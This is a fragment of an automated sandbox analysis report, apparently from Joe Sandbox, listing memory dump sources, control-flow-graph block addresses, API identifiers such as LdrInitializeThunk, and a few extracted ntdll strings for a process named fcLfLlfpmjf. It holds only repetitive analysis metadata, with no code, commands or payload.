                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E7000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001560000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001566000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.00000000015A2000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001603000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001609000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_14e0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 5 1552c1d-1552c26 LdrInitializeThunk
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(0156FD4F,000000FF,00000024,01606634,00000004,00000000,?,-00000018,7D810F61,?,?,01528B12,?,?,?,?), ref: 01552C24
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1511174351.0000000001506000.00000040.00001000.00020000.00000000.sdmp, Offset: 014E0000, based on PE: true
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E7000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001560000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001566000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.00000000015A2000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001603000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001609000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_14e0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 8 15535c0-15535cc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1511174351.0000000001506000.00000040.00001000.00020000.00000000.sdmp, Offset: 014E0000, based on PE: true
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E7000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001560000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001566000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.00000000015A2000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001603000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001609000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_14e0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 9 42d633-42d671 call 42dad3 13 42d673-42d690 9->13 14 42d6c0-42d6c5 9->14 16 42d692-42d6a0 13->16 17 42d6a3-42d6a9 13->17 16->17 19 42d6af-42d6bd 17->19 19->14
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1509855724.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_42d000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 21 42d994-42d9ce 22 42d9d4-42d9e5 21->22
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1509855724.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_42d000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 23 42db09-42db28 24 42db2e-42db35 23->24 25 42db37-42db39 24->25 26 42db49-42db4c 24->26 25->26 27 42db3b-42db47 call 42dad3 25->27 27->26
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1509855724.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_42d000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 32 42db13-42db28 33 42db2e-42db35 32->33 34 42db37-42db39 33->34 35 42db49-42db4c 33->35 34->35 36 42db3b-42db47 call 42dad3 34->36 36->35
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1509855724.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_42d000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 30 42d9a3-42d9ce 31 42d9d4-42d9e5 30->31
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1509855724.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_42d000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 39 42da33-42da46 40 42da4c-42da50 39->40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1509855724.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_42d000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    Strings
                                                                                    • SsHd, xrefs: 0152A3E4
                                                                                    • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 015779FA
                                                                                    • RtlpFindActivationContextSection_CheckParameters, xrefs: 015779D0, 015779F5
                                                                                    • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 015779D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1511174351.0000000001506000.00000040.00001000.00020000.00000000.sdmp, Offset: 014E0000, based on PE: true
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E7000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001560000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001566000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.00000000015A2000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001603000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001609000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_14e0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                    • API String ID: 0-929470617
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1511174351.0000000001506000.00000040.00001000.00020000.00000000.sdmp, Offset: 014E0000, based on PE: true
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E7000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001560000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001566000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.00000000015A2000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001603000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001609000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_14e0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: $
                                                                                    • API String ID: 3446177414-3993045852
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%